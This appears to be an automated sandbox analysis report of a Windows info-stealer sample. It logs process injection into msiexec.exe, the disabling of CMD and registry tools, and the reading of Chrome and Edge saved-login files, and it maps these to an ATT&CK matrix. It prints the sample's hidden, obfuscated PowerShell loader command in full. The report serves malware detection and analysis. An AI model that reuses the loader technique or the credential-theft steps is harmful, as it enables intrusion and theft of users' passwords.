            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7586Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2140Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: msiexec.exe, 00000006.00000002.3284691137.00000000079E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeAPI call chain: ExitProcess graph end nodegraph_0-3391
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E1F2A0 LdrInitializeThunk,LdrInitializeThunk,2_2_04E1F2A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 44E0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$retskrivningsreformer=get-content -raw 'c:\users\user\appdata\roaming\skittaget\lektier\tegnkapacitet\dyretmmeren.lge';$sammenskriv=$retskrivningsreformer.substring(71921,3);.$sammenskriv($retskrivningsreformer) "
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$retskrivningsreformer=get-content -raw 'c:\users\user\appdata\roaming\skittaget\lektier\tegnkapacitet\dyretmmeren.lge';$sammenskriv=$retskrivningsreformer.substring(71921,3);.$sammenskriv($retskrivningsreformer) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryToolsJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)311
            Process Injection
            1
            Software Packing
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Clipboard Data
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
